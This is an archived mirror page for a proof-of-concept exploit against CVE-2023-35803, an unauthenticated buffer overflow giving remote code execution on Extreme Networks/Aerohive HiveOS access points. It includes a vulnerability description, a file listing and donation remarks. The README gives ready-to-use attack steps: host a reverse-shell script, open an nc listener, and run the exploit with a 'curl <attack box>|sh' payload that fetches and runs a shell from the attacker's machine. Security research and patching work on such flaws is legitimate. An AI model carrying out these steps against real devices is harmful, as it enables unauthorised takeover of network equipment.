CVE-2023-35803 PoC — Extreme Networks IQ Engine 安全漏洞

Source

https://github.com/lachlan2k/CVE-2023-35803

Associated Vulnerability

Title:Extreme Networks IQ Engine 安全漏洞 (CVE-2023-35803)
Description:Extreme Networks IQ Engine是美国Extreme Networks公司的一个引擎。 Extreme Networks IQ Engine 10.6r2 之前版本存在安全漏洞，该漏洞源于 Extreme Networks IQ Engine 存在缓冲区溢出。

Description

PoC Exploit for CVE-2023-35803 Unauthenticated Buffer Overflow in Aerohive HiveOS/Extreme Networks IQ Engine

Readme

## CVE-2023-35803 - Unauthenticated RCE in Extreme Networks/Aerohive Wireless Access Points

PoC for ARM-based access points running HiveOS/IQ Engine <10.6r2.

1. Edit `revshell` to point to your shell catcher IP/port
2. Host the reverse shell: `python3 -m http.server`
3. Open a shell catcher: `nc -lvnp 1337`
4. Run the POC (may take a few minutes): `python3 poc.py <ip of ap> "curl <ip of attack box>:8000/revshell|sh"`

---

Writeup here: [https://research.aurainfosec.io/pentest/bee-yond-capacity/](https://research.aurainfosec.io/pentest/bee-yond-capacity/)

<img src="https://research.aurainfosec.io/pentest/bee-yond-capacity/featured.png" width=250 />

File Snapshot


 [4.0K]  /data/pocs/596398d9cee28446ca0b1718c1fa41d42cca5b51
├── [ 20M]  gdbstatic
├── [1.7K]  poc.py
├── [ 660]  README.md
└── [ 122]  revshell

0 directories, 4 files

Shenlong Bot has cached this for you

Remarks

1. It is advised to access via the original source first.

2. If the original source is unavailable, please email f.jinxu#gmail.com for a local snapshot (replace # with @).

3. Shenlong has snapshotted the POC code for you. To support long-term maintenance, please consider donating. Thank you for your support.

Goal Reached Thanks to every supporter — we hit 100%!